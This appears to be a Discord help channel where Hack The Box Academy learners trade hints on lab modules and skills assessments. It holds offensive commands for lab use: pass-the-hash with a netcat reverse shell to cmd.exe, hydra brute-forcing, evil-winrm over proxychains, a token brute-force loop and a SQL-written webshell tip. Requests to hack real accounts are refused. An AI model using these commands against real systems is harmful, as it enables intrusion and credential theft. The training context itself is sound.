#modules

1 messages · Page 117 of 1

wispy aspen
#

having a 'bible' is not a bad thing

thick juniper
#

Threader3000 is a really good quick scanner for ports

#

Gets the ones in higher places too

obsidian yew
#

guys how to download kali linux

carmine osprey
#

On the firewall ips/ids evasion medium lab, i think it wants me to use netcat to bypass it. But it’s not letting me use source port as a command in netcat. Ideas?

fathom pendant
obsidian yew
fathom pendant
#

No lol

#

It takes all of half a second for Google to pull up the results

obsidian yew
#

k

proven silo
# wispy aspen having a 'bible' is not a bad thing

Indeed I do like that, I take notes at the same time as I learn and I practice on an easy machine, but my fear is to have too much information and not knowing where to find the information, I think that over time I will delete some information and clean up my notes, but it's always terrifying to delve into this amount of information, practice will free me from this fear! thanks to you

latent sigil
#

HI, i am currently stuck at the question Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host,

#

AD Enumeration & Attacks - Skills Assessment Part II

#

can anyonne helpme out?

#

i have found the || mssqlsvc|| account name and password and administrator hash but have failed to log on to ms01 with pth (for the admin account) or just plain old evil-winrm using the ||mssqlsvc||

pine dagger
#

Which question number is that?

latent sigil
#

8

pine dagger
#

I used ||chisel|| with ||proxychains|| and ||evil-winrm||, and just passed the ||service account and its hash|| and it worked fine.

latent sigil
#

so you proxychained the sql01?

coarse meadow
#

cansomeone pls help hack soething?

#

something pls

pine dagger
coarse meadow
#

#wolfiej can you help e with something pls?

pine dagger
#

?

coarse meadow
#

can you accept my riend reqiest

pine dagger
#

No.

coarse meadow
#

request

#

why?

pine dagger
#

Because I don't know you. If you've got a question regarding modules, put the module, chapter, and question in here, and explain what you don't understand.

coarse meadow
#

k

latent sigil
#

bruh

pine dagger
#

Someone didn’t read the rules

coarse meadow
#

wdym?

latent sigil
#

@pine daggeryeah it didnt work, idk why i would need to proxychain it

pine dagger
#

<@&861185840277487616>

latent sigil
#

like if im on the same network it should work right

#

through a computer or not

pine dagger
#

I wasn't. I was chaining through the target host.

#

and it worked for me... sooo no idea why its not for you

coarse meadow
#

@pine dagger can you tell me witch rule did I brake?

pine dagger
coarse meadow
#

how did I brake that?????

pine dagger
#

You’re asking to break into a gmail account. That’s not legal

coarse meadow
#

<@&861185840277487616>

#

then waht do you do pls tell me?

#

@pine dagger

coarse meadow
surreal rain
#

bruh...

novel matrix
#

hmm

#

Not nice

surreal rain
#

Wow...

#

Saw that coming

novel matrix
pine dagger
#

Hrmm?

undone narwhal
#

pls share a screenshot if possible and blur out sensitive things

coarse meadow
latent sigil
#

no

#

actually, go and look anywhere but here

coarse meadow
#

si is this not even a fucking hacker sever?

undone narwhal
#

It's been a while since I did this and I don't think you use a password to login as mssqlsvc

latent sigil
#

ok ill use the hash

undone narwhal
#

You have everything you need

pine dagger
#

Probably delete hashes and passwords… even obscured ones 🙂

latent sigil
#

thanks

pine dagger
#

Hope you get it!

latent sigil
#

yep just got a shell its been approximately 5 hours im stuck on this

pine dagger
#

AD Enum is a tough module

latent sigil
#

yeah

#

it really is

fathom pendant
#

Never saw a skid tell on themselves before... crazy

zinc marsh
#

what is the time of the servers?

#

I think I made the script right but I think the problem is the time.

pine dagger
#

Have to brute force it iirc

zinc marsh
#

my script is fine I think

#

the only problem I think is the machines uses different times

#

or well maybe the problem is python which doesn't let me use md5 hashing without encoding first

pine dagger
#

Not sure why you're using an input for your time. Just use the time from the machine:
||from time import time current_time = int(time()) * 1000||
Then you can change the start and end time by + and minusing from that. You can simplify your code as well:
||for i in range(start_time, end_time + 1): md5_token = md5((username + str(i)).encode()).hexdigest()||

pine dagger
#

You dont need that time

zinc marsh
#

from: 234952 to 234954

pine dagger
#

You can use your attacker machine time.

#

Huh?

#

Thats not a time

zinc marsh
pine dagger
#

You need to use linux epoch

zinc marsh
#

ah lol

#

-.-

mild cypress
#

Quite stuck on this module and could use a hand:
https://academy.hackthebox.com/module/147/section/1356

I'm currently trying to ||mount a .vhd file|| and seem to be getting stuck on this line: ||Enter key or passphrase ("/dev/sda2"): which leads to (cryptsetup exited with status 2: No key available with this passphrase. (0))||

I'm not sure how to find this password, or if I'm misinterpreting things.

Feel free to DM me 🙏

pine dagger
# zinc marsh ah lol

I think thats the main issue you're having. With using linux epoch, you should be able to get the rest of it working. Just remember to provide a certain amount of msec from start to end.

pine dagger
mild cypress
pine dagger
#

You need to use John after you've got the hashes from that tool

mild cypress
pine dagger
#

looool

mild cypress
mild cypress
# pine dagger looool

Next steps are going to be learning how to unmount all of the partitions I accidentally mounted in this process 😂

mild cypress
pine dagger
hidden trellis
#

Can i please get some help?

zinc marsh
#

I had done the script in 3 languages to try -.-

pine dagger
# hidden trellis Can i please get some help?

You're probably overthinking this one. The example shows you how to do it. ||But you need to use a different method. If you look at the source code, there's only two actions you can really do. Buy, or Redeem. Only one of them has a race condition though.|| I'd recommend I would do more sessions than they do 🙂

#

Metasplit should work. Make sure you specify the vhost.

gloomy bramble
#

HOLY #$*$ finally got the flag on the Attacking Common Services Hard module. Alot of research on correct exec commands and alot of ChatGPT. syntax corrections. Quite proud of myself right now. The part that kept confusing me ||was the way 'create a linked server' from one of the txt files is worded.|| I Had to really think about that.

hidden trellis
mild cypress
pine dagger
fathom pendant
#

<@&861185840277487616>

short hare
#

@west night
Can I DM you???

quick magnet
#

hi i'm stuck in module password attack section attacking sam

Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer.

  • try xfreerdp with bob user, access denied
  • try smbclient share ADMIN$ but reg.exe: command not found
trail leaf
#

You should be able to use RDP. Double check to make sure you're putting password in single quotes or escaping certain special characters

#
xfreerdp /u:bob /p:'P@ssw0rd!' /v:10.10.10.10
quick magnet
wispy aspen
#

Also, did you "run as administrator" CMD?

#

FWIW that command works for me, so you may want to verify you ran the command prompt as an administrator.

quick magnet
split parcel
#

anyone can help on ATTACKING COMMON APPLICATIONS - Other Notable Applications assessment?

I found the application which is vulnerable.

I got the exploit from exploit DB, and managed to test for Code Execution. But no matter what rev shell codes, i used. it still cannot work.

I know msf exploit can work, and tried it. Just wanna figure out why my rev shell payload is not working.

hidden trellis
#

can i ask someone about type juggling in whitebox attacks

final maple
split parcel
#

nope, i am using ||48971||, i'll try using ||48320.py|| thanks!

final maple
hidden trellis
final maple
#

Is that in the CBBH exam?

acoustic owl
acoustic owl
wild dragon
#

@hidden trellis I sent you the guide for it

short hare
#

I am really stuck at this question. Please help me!
Tried everything from forums, etc. Not able to get the password for the 'sam' user and hence the flag. 😭

short hare
#

I tried ftp: access denied
smb shares: found nothing
and ssh: ......................... sadglas

#

how ? all ftp login says wrong password

wild dragon
#

@short hare

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

sed '1,17000d' mut_password.list > mut_password1.list

following this!

#

using it to to crack sam's password!

mut_password1.list
short hare
#

ok let me give it a try

wild dragon
#

???

#

thank you, friend!

short hare
#

m using ..

#

hydra -t 4 -L user.txt -P mut_password1.list ssh://<ip>

and in user.txt gave 'sam' only as the user

wild dragon
#

you should crack FTP!

wild dragon
spring moon
#

I'm not really familiar with mounting vhd files in linux I was following this page and somehow I'm getting this error

https://itsfoss.com/mount-encrypted-windows-partition-linux/

sudo dislocker /dev/loop0p2 -upassord -- /media/bitlocker
Sun Aug 13 09:11:47 2023 [CRITICAL] None of the provided decryption mean is decrypting the keys. Abort.
Sun Aug 13 09:11:47 2023 [CRITICAL] Unable to grab VMK or FVEK. Abort.

short hare
#

Feels like crying...!

short hare
compact jacinth
#

hi im doing my first linux module and im stuck on "Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer." and cant find the answer anywhere help!!

wild dragon
#

@compact jacinth you should tell everyone what is your section & module!

latent sage
latent sage
#

hello @slender shoal can i also PM you for some inquiries ?

short hare
acoustic owl
short hare
wild dragon
spring moon
#

Hi there, I'm trying to solve the Password Attacks Lab - Hard :

Found a smb share /david/Backup.vhd and I'm trying to mount it for too long now, I haven't done this before any help on below error?
I'm not sure what's the key for /dev/sda2?

guestmount --add /mnt/david/Backup.vhd --inspector --ro /mnt/vhd
Enter key or passphrase ("/dev/sda2"):
guestmount: could not find key to open LUKS encrypted /dev/sda2.

Try using --key on the command line.

Original error: cryptsetup_open: cryptsetup exited with status 2: No key available with this passphrase. (0)

acoustic owl
# spring moon Hi there, I'm trying to solve the Password Attacks Lab - Hard : Found a smb sh...
It's FOSS

Here’s the scenario. My system came with Windows 10 Pro and that came with BitLocker encryption. I installed Ubuntu in the dual boot mode even with the BitLocker encryption enabled for Windows.

You can easily access the Windows files from within Linux. No hi-fi stuff here. Just go to

spring moon
#

I was trying this and got an error, I don't recall it now as my lap time was up, I will redo these steps again

spring moon
#

Yes yes I have seen all these medium pages from other guys asking the same question I'm trying it all over again

pine dagger
#

We have no clue what you have and haven't seen /shrug

spring moon
#

what does this mean?
Sun Aug 13 10:54:11 2023 [CRITICAL] None of the provided decryption mean is decrypting the keys. Abort.
Sun Aug 13 10:54:11 2023 [CRITICAL] Unable to grab VMK or FVEK. Abort.

pine dagger
#

None of the **provided decryption** mean is **decrypting** the keys.

spring moon
#

the key im typing is incorrect?

#

I'm using the same password for david, as I'm assuming it should open me this vhd file as it's shared on his name, right?

pine dagger
#

I would suspect that the tool you are using (guestmount) doesnt support mounting bitlocker encrypted drives

#

And no david's password doesn't work

#

Because that would be too easy for a Hard Skill Assessment 🙂

spring moon
#

wow, because I saw some people after successfully mounting the file there are more steps with sam files etc, okay!
But any hint where else to search for this password then? I have two more passwords from the file "login.kdbx"i found on johanna machine.

pine dagger
#

Try looking at what ||John|| can do.

#

And not the specific program

spring moon
#

I thought of something like vhd2john but no script

pine dagger
spring moon
#

wow It's exactly there thanks, lemme dig more then thank you!

pine dagger
#

Almost like they are testing you with the skill assessment on things you were taught...

spring moon
#

Yeah only if I could recall this :(((( I was struggling with the mounting and reached several times to this key pass thing, found out, I'm using wrong key. I hope I will manage to crack in.

pine dagger
#

That's why I put my content into OneNote. Made it all searchable 🙂

fresh pine
#

When in Windows **Privilege Escalation > Print Operators ** I can't figure out what to do when it says compile with Visual Studio 2019 (cl.exe). It isnt recognized and the user path doesnt exist...

Any Ideas? 🙏

barren apex
#

what error are you getting

spring moon
pine dagger
acoustic owl
torn steppe
#

One question if we need to write http 127.0.0.1 9050 in the proxychains.conf in order to make rpivot work, why we call it SOCKS when in reality is HTTP???

proud pine
torn steppe
#

Sorry If we are not using socks type conexion, why we still call it socks? I mean we have to configure proxychain with http, not with SOCKS, still we call it socks proxy?

#

Sorry I am new on this, this thing just makes me feel confused

proud pine
#

You should be doing it as socks

torn steppe
#

it doesn't work for me

#

tried with socks4 127.0.0.1 9050 and socks5 127.0.0.1 9050 and then proxychains firefox-esr IP:80

#

Just giving me page not found

#

I modified with http 127.0.0.1 9050 and worked perfectly

#

But I think that it is still using SOCKS protocol even in the configuration we put http that is the reason I supose that htb still name it SOCKS proxy ...

proud pine
#

Even though the module suggests using proxychains like that, you really shouldn't do it that way, and it probably is what is giving you issues

#

use something like foxyproxy

torn steppe
#

oki I tried to add

proud pine
#

Instead of piping literally everything through proxychains, it's an extension that will allow you to quickly just turn socks proxies on/off.

torn steppe
#

I mean I tried to add one proxy to foxyproxy

#

COuld I dm you?

#

ok done easier with foxyproxy

#

but still I dont understand why if socks5 support http it doesnt work

#

thx restie probably this is going to solve my doubt about the excercise... i..ot

vital adder
proud pine
#

Not necessarily. Some machines block pings.

rancid holly
#

Hi everyone, need some help in the shells & payloads module live engagement
Tried multiple things but everytime not able to get a shell

rustic sage
#

Guys is the bug bounty hunter module a guarantee way to like master it if i study it a lot

glacial dragon
#

There a question in Linux fundamentals

#

Which kernel version is installed on the system?(Format:1.22.3)

#

I tried uname -v

#

But the answer does not match

#

Idk why I'm not allowed to send photos here

#

The + is disabled

#

I'll try from pc

#

I think so

vital adder
plain coral
obsidian yew
#

guys how to download kali linux

acoustic owl
frozen mesa
#

ATTACKING COMMON SERVICES - Attacking SMB
Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer.

I got the password; whenever i want to SSH it gives me: jason@10.129.72.27: Permission denied (publickey).

Tried some things but didn't get my where i needed to be. Any nudge, anyone?

civic zenith
#

I'm stuck on AD Skill Assessment part II. I only need 2 more flags. Could use a hint or two if anyone here has finished the AD module

stable trout
stuck ibex
#

Hello, i have i problem with Suricata Rule Development Part 1 question, the question is In the /home/htb-student directory of this section's target, there is a file called local.rules. Within this file, there is a rule with sid 2024217, which is associated with the MS17-010 exploit. Additionally, there is a PCAP file named eternalblue.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to MS17-010. What is the minimum offset value that can be set to trigger an alert? I don't understand how to find the minimum offset value. I would be glad if some1 could explain this to me.

keen oasis
pulsar needle
#

Attacking Common Services - Easy, Ive found the username ||fiona@inlanefreight.htb|| but it wont get bruteforced

pulsar needle
#

With or without inlanefreight?

keen oasis
#

Without

pulsar needle
#

ah ok

rustic sage
#

one sec. I'll do the machine again and help you

keen oasis
pulsar needle
#

Ah ok

#

But it doesnt work

rustic sage
#

rockyou

pulsar needle
#

Ah thx

rustic sage
#

also, i used this command that's in cheatsheet hydra -L users.txt -p 'Company01!' -f 10.10.110.20 smtp

gloomy bramble
rustic sage
#

he wants the password

pulsar needle
rustic sage
#

another hint for later, 0 = cmd

pulsar needle
#

Question ||IMAP and POP3 isnt running on the host, so how am i supposed to access the mail xd||

rustic sage
#

did you know that microsoft have their own sql server?

#

and you can access webpages using ip's

pulsar needle
#

wdym

#

how would that help?

rustic sage
#

man, look at ports

pulsar needle
#

I know

#

but, sometimes the sections cover something and the skill assessments cover something completely different

rustic sage
#

read the sql section about microsoft and go to its webpage

pulsar needle
#

aaaaaaaaa

rustic sage
#

don't worry. the medium machine will be simple

fathom stump
#

In Footprinting/imap & pop3...

I've found the flag in imap, but when submitting it as an answer it gets rejected. There aren't any other flags requested in this module, so I'm not sure what I'm doing wrong

rustic sage
#

you need to find both

#

one for pop3 and the other for imap

fathom stump
#

Oh, I missed a question. There are two flags for imap

#

Are you sure there's one for pop3? Both questions say imap. Maybe that's an error?

rustic sage
#

yes

#

there are two flags

fathom stump
#

Yeah, but the questions both say imap though

rustic sage
#

it must be a mistake

dusky rivet
#

Hello, need help on Academy module - Footprinting Lab - Medium, I have an error when I try to connect to SQL server

rustic sage
#

@fathom stump if you want the credentials for imap, read the section again

fathom stump
#

I've found the flag in the imap emails

#

It's the one that says "enumerate imap and submit the flag" that I can't find

#

pop3 has no emails on it for the given user

rustic sage
#

@dusky rivet use your machine

dusky rivet
rustic sage
#

@dusky rivet did you know that you can open a database as administrator?

#

and use that to authenticate

#

rdp and you can find the password in the machine

dusky rivet
#

Not sure to understand, context: I used the pwnbox to log in though rdp with the user Alex. Now I have to get the password in the DB in MSSQL, I found creds to get it. But I can't use them with the GUI

rustic sage
#

you can

dusky rivet
#

huh

rustic sage
#

right click and open as

dusky rivet
#

yup

#

but Alex isn't Admin

rustic sage
#

I know

#

but you have the password

#

that are in the a user machine

dusky rivet
#

and I don't know the administrator's password, I've already completely pwned (via metasploit) the machine so I can change the admin password but it was unexpected

#

aaah, run as alex, or the famous second account?

fathom pendant
dusky rivet
fathom pendant
#

Just copy and paste

fathom stump
#

Got both flags, they are both in imap @rustic sage

#

Just need to find the admin email now

dusky rivet
rustic sage
#

go to the forum, they'll give you the command

obsidian yew
#

guys how to download kali linux

fathom pendant
rustic sage
#

Youtube has many guides for that

hallow kiln
trail leaf
unborn cypress
#

Hi 👋 do you know some youtuber I can learn hack from it

#

Or website

rustic sage
#

ippsec

latent sigil
#

`rogram 'inveighg.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1

  • .\inveigh.exe

At line:1 char:1

  • .\inveigh.exe
  •   + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
      + FullyQualifiedErrorId : NativeCommandFailed`
#

can someone help me please?

autumn pilot
#

inveighg.exe' this is your error

latent sigil
#

im at skill assesment 2 of the ad module question 9

#

thats the file name

#

`Program 'inveigh.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1

  • .\inveigh.exe

At line:1 char:1

  • .\inveigh.exe
  •   + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
      + FullyQualifiedErrorId : NativeCommandFailed
    

`

#

ive seen its a problem with x64 or x86

#

but ive treid both versions and it still doesnt work

#

mimikatz the same problem

proud pine
proud pine
# latent sigil transferring

I'd check the file hash, to make sure that they aren't getting corrupted in transit. If so, try a different method.

latent sigil
#

ok

#

where can i find inveigh in the attack box>

#

ive tried locate

autumn pilot
#

If it's not in C:\Tools\, you will have to transfer it

latent sigil
#

is invoke webrequest a good file transfer method?

#

its what ive ben using

#

even powerview was giving me errors

proud pine
#

Are you using UDP for VPN? Might give you some issues.

latent sigil
#

yes i am

#

cuz ive checked the hashes and theyre completely different

#

great

proud pine
latent sigil
#

which ones are the most reliable?

#

pyhton3 -m http.server and invoke web request dont seem to be that great haha

#

ill try doing smb server or something like that

proud pine
#

The python method has always worked fine for me.

pulsar needle
#

Attacking Common Services - Easy, ive got the credentials and ive tried to connect to the IP using telnet, i successfully authenticated, but how am I supposed to retrieve the mails? Ive been stuck on this for a while now

#

None of these work

latent sigil
#

idk why the other way didnt

#

is Inveigh just a beefed up responder?

pine dagger
# latent sigil is Inveigh just a beefed up responder?

I was curious, so I googled. Top result:
"Regardless of how Inveigh is described though, if you have used Responder, Inveigh's functionality will be easy to understand. The main difference being that where Responder is the go to tool for performing LLMNR/NBNS spoofing attacks, Inveigh is more for PowerShell based Windows post-exploitation use cases."
Take that how you will.

latent sigil
#

ah

#

thanks

pine dagger
#

If you're logged in with the user account you found, you should be able to ||create a file on the server, and then use that as a webshell||.

pulsar needle
#

Ah

#

Nvm, I found something

latent sigil
#

can someone help me understand winrm?

pine dagger
#

Ask the question

#

And someone may respond

#

Don't ask to ask 😄

latent sigil
#

so ive been trying out win rm to dc01 with the credentialls for the last user in the skill assesment, because logically, if i got the hash from that ip i should be able to connect to it right? so ive done that with smb but when i try to do anything else tahn with smb, nothing works. win rm, smbexec, psexec, rdp, whatever.

#

im redoing a full port scan on it to see if theres like a hidden port or something

pine dagger
#

You're referring to AD Enum right? Which chapter/question?

latent sigil
#

skill assesment 2 Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

#

try revshells

pine dagger
#

Ah Right. WinRM with username and password worked fine for me with evil-winrm to DC01 through my proxychain

#

pass it the param?

#

?cmd=id

#

as an example

pulsar needle
#

Nothing, but I think I know why, its because I changed the shells thing from " to ' so i can have it in ""

#

but I cant upload the shell if I dont change them lol

latent sigil
#

|| evil-winrm -u CT059 -p c***** -i 172.16.7.3 ||am i just super dumb?

pine dagger
#

Works for me

latent sigil
#

bruh

pine dagger
#

As said, I did it via proxychain though

latent sigil
#

but proxychained from your personal pc to the attack host right

pine dagger
#

yarrrr

latent sigil
#

ah

pine dagger
#

might be the initial target doesnt have a good version of evil-winrm

pine dagger
#

You need single quotes around cmd, and double quotes around the php code, and I used single quotes on the OUTFILE.

latent sigil
#

i wear to god i hate win-rm `sudo proxychains evil-winrm -i 172.16.7.3 -u CT059 -p *****ProxyChains-3.1 (http://proxychains.sf.net)

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1`

pulsar needle
#

Ah

#

I was stupid, its windows not linux, thats why ls didnt work xd

sleek urchin
#

Doing Whitebox Pentesting 101: Command Injection: Skills Assessment and i believe I have found the vulnerability and to confirm it I used tcpdump to ping myself

latent sigil
#

@pine dagger can you dm your command?

sleek urchin
#

but i don t know how to continue from there, any help i well appreciated !!

fresh shale
#

Hello guys , any tips for new people on htb

sleek urchin
pine dagger
pine dagger
rustic sage
#

👍

pine dagger
sleek urchin
sleek urchin
pine dagger
obtuse fiber
sleek urchin
pine dagger
fresh shale
zinc marsh
sleek urchin
latent nest
#

Can someone hack my exes discord

sleek urchin
latent nest
#

🙏

hallow kiln
pine dagger
trail leaf
zenith acorn
#

just steal her phone duh

#

or connect to her wifi you probably had the password of

jade shoal
#

I'm doing the Splunk module (https://academy.hackthebox.com/module/218/section/2356), and I'm maybe misunderstanding the phrasing of this (or the actual meaning behind the eventid):
find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes
4624 is successful logins - 4625 is failed. I read an attempt, as a failure - am I misunderstanding it, or ?

inner hedge
#

Im having the same issue, no problem reaching other boxes but Timelapse doesn't show any open port, anyone else?

acoustic owl
jade shoal
naive gate
#

hello

tranquil breach
#

Hello everyone.
How can i use the bon key provided in interactive section in order to interacte with the target on my own machine??
Someone to help me please

naive gate
#

i'm broke, any free training academies for cybersecurity?

jade shoal
#

Did you solve this? :)

sly tapir
jade shoal
warm kernel
#

can anyone direct me to any course on htb that helps with rpc? I keep landing on boxes that has some of these open, and I never know how to approach them.

coarse flint
#

Hi , i'm doing the WINDOWS EVENT LOGS & FINDING EVIL module (https://academy.hackthebox.com/module/216/section/2303) , and i cant seem to understand the question : By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe . Can anybody give me a hint ?

rapid sparrow
#

Submit the contents of the flag.txt file on the Administrator desktop on MS01

zinc marsh
#

someone could give me a hint please

shut wraith
#

Is there a general channel

high zinc
#

yes, once you verify your Discord account with a token from your user profile

analog cliff
#

does anybody know why kerbrute tool (AD Enum&Attacks module) doesn't save output to the file when specified? Tried -o/--output and it only creates the empty file. Same with existing file - writing to it doesn't do anything

#

It worked yesterday, though

tulip parrot
#

Module: Attacking Common Services
Attacking SQL Databases

Hello, I have issues for the first question : What is the password for the "mssqlsvc" user?
When I launch
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
I got the return name and under it nothing.
I saw that the user sa exist but when I try to use it, it say that it doesnt exist or that i dont have permission
I am working with mssqlclient.py
thx

latent sigil
acoustic owl
#

I can't get it to work with range().

sly tapir
#

I believe i used time bin … ill be back at the computer later and can dm

acoustic owl
shut wraith
rapid sparrow
#

Or other method like create new user to login with rdp

latent sigil
#

Nah I just used the hash that I got (NTLM) and winrm

acoustic owl
shut wraith
acoustic owl
shut wraith
#

U come in here with ur fluffy ears and claim to have a "solution" to everything that goes on

#

Did u consider that I'm NOT SURE if I want to create an account

acoustic owl
#

Without verifying your account, you will not have access to many channels.

shut wraith
#

Thats strike 2

latent sigil
#

strike 2 like managing a child lmaooo

wooden dust
#

why after doing pass the hash with mimikatz command specified in /run is still getting run as my current user, not the one i have passed hash? sekurlsa::pth /user:julio /rc4:811c7040a32423b74b14043a9f76cd0 /domain:. /run:"C:\tools\nc.exe 10.129.1.6 9876 -e cmd.exe"?

shut wraith
latent sigil
#

yes

sly dome
#

how do you get academy role

shut wraith
#

Traitor

high zinc
#

it's a rule we had to enforce due to spammers and kids who were up past their bedtime

acoustic owl
sly dome
#

ah ok

shut wraith
#

Does HTB have boxes or material for reverse engineering

high zinc
#

Some I believe

sly tapir
#

Is HTB going to drop a SOC Analyst Cert?

high zinc
#

I mean... they've got the job role lined up... my guess is yes, but it's just a guess

acoustic owl
sly tapir
#

Ya ok—i saw that and was like wait a sec

acoustic owl
sly tapir
#

time to re-new

acoustic owl
# sly tapir time to re-new

I am waiting for HTB to announce the entire path.
I still have a lot to learn....
So I know what all is coming up.

high zinc
tulip parrot
shut wraith
#

@acoustic owl I've decided to create an account

#

Wtf someone used my email ..... ????

wispy aspen
acoustic owl
shut wraith
#

How do I connect it to discord

wispy aspen
acoustic owl
fathom stump
#

Footprinting/SNMP

I'm guessing there's a specific word list to use with onesixtyone that isn't in the seclists/snmp folder? No hits with anything there.

deep owl
#

hello all i really need your guys help

#

module: Skills Assessment - Using Web Proxies

#

question 3

#

all the results are showing 404

lament valve
#

So I've been at this for quite some time and I'm pretty stumped. A seemingly straightforward problem: “What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.” But I’m stuck and the hint is garbage. “Get-WinEvent can show us the specific records and how many there are right?”
Located in INTRODUCTION TO WINDOWS COMMAND LINE Skills assessment last question question. For those who want to login you'll need this: user10 & vmtoolsd.exe (password)
Normally I would figure this out myself but I’ve been at this for 4 hours and the closest I can get is using:

Get-WinEvent -FilterHashtable @{ProviderName = ‘Microsoft-Windows-Security-Auditing’ LogName = ‘Security’ Id = 4625} | Select-Object -ExpandProperty Message

In desperation I also tried dumping the list of ActiveDirectory users with:

Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName
And trying each as an answer which still hasn’t gotten me the answer.
Please help!!

#

rt command should be what your looking for

tender lake
#

I'm doing the Pivoting module, RDP and Socks Tunnelling with SocksOverRDP. I have started the SocksOverRDP dll and Ran the server thing on the first host, setup Proxifier and added the Proxy server. When I try to connect from the initial foothold to the target with RDP I get the following error. Anything else I can do from my end to fix this?

woven bluff
#

What Is DC IP?

trail leaf
#

Probably shorthand for saying the domain controller’s IP address

woven bluff
#

Thanks

sly tapir
zinc marsh
glad edge
#

A bit stuck on the last question under Attacking common services - Attacking SQL Databases. I've got the mssqlsvc and logged in via mssqlclient.py, but I'm not sure what commands to run. I'm at lost when it comes to SQL syntaxes etc.

gloomy bramble
heavy marsh
#

xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer

Is the comma in here an error? The command is not working. I changed the IP, the username, and the password for the exercises. I also changed the file path to home/kali/test.txt

#

[ERROR][com.winpr.commandline] - Failed at index 4 [/drive:linux,home/kali/tester.txt]: PostFilter rule could not be applied

#

that's the error I got

#

Okay, nevermind, it's working now

#

You have to have an RDP session already running before you log in for the tsclient

misty mural
#

I am working through the DNS Enumeration Using Python module.

I added the IP for inlanefreight.htb to my hosts file. My question is, I can dig a record for inlanefreight.com. When I use dig against inlanefreight.htb, I have to input @<IP> following.

Why do I have to @ the target IP if I added the domain name and IP to my hosts file?

fading atlas
#

Hi, All Session Security Skills Assessment, Can someone help

full drum
#

Hi there, working on "Intro to AD Enumeration" module, page "skills assessment 2". Stuck on Q8 - Getting Admin access to MS01, if anyone can msg me or provide any hints I'd be eternally grateful. Thanks

vital adder
vital adder
acoustic owl
plain coral
#

tr 'A-Za-z' 'N-ZA-Mn-za-m' < encrypted_file.txt > decrypted_file.txt

#

Or just use cyberchef

fathom pendant
#

Are you using the provided wordlists?

uncut flint
#

Can I please have some guidance on Keeper?

pulsar needle
#

Question on "Attacking Common Services - Medium",|| ive enumerated the target and I cant get a foothold, ive tried enumerating the DNS server, found nothing. Tried to connect to the FTP services and I wasn't able to, should I start bruteforcing the services now? I see no other way||

#

I get connection refused when I try connecting to FTP

vital adder
#

bruh hint enum ||highest ports||

barren apex
acoustic owl
pulsar needle
#

I know what it is

#

But it dosent work lol

barren apex
#

what about the other one

acoustic owl
#

Try it without username. Not every server accepts a username this way

pulsar needle
#

Doesnt work

fiery berry
barren apex
#

look at your nmap scan, its staring you in the face

pulsar needle
#

||aaa maybe using it as a proxy lmao for 30021||

fiery berry
#

try without the -P

barren apex
#

if you have an unknown service how can you tell nmap to find more info about what is running?

pulsar needle
acoustic owl
pulsar needle
#

a

fiery berry
barren apex
acoustic owl
barren apex
#

oh FTP, yeah -P can be used to specify the port number

acoustic owl
barren apex
#

ah my bad, its early in the morn

pulsar needle
#

It says -P specifies the port in the man page

#

||And I tried using a proxy but it didnt work xd||

vital adder
pulsar needle
#

I am very lost, I have no clue what to do except brute forcing (But I know it should be the last thing one does so I wont do it just yet)

vital adder
#

i'll help you in dm in a sec

acoustic owl
# pulsar needle

For this reason I have linked you to the man page.
-P is wrong.

try it like this
ftp <ip> <port>

vital adder
#

or this will help better 👆

pulsar needle
#

I guess the box is just broken

vital adder
#

if you saw the tmp screenshot i send then you should get what the right path for this assessment is and try the usually troubleshoot restart the box, try the pwnbox, change the vpn

pulsar needle
#

ok

#

Huh the box wont work, ive switched VPN

vital adder
#

of course the box that you have is on the old vpn restart the box to get a new one that are in our new vpn network

pulsar needle
#

Now it works

#

Weird

#

(The -P option isnt wrong for my version)

umbral fulcrum
#

hey guys, I'm stuck at the "Attacking Common Services" : "Attacking SQL Databases" at the Q : " What is the password for the "mssqlsvc" user? "
does some1 have a hint 4 me?

umbral fulcrum
#

hhmmmm, so I need 2 get a hash I understand...

#

I think I got it, thanx

knotty hemlock
#

I'm trying to solve the Heartbleed task in HTTPS/TLS ATTACKS , but i can't get the private keyw with the command given in the module text. I know it's not deterministic, but i ran it at least 20 times in a row now.. is that normal? should I continue trying or is something wrong_

knotty hemlock
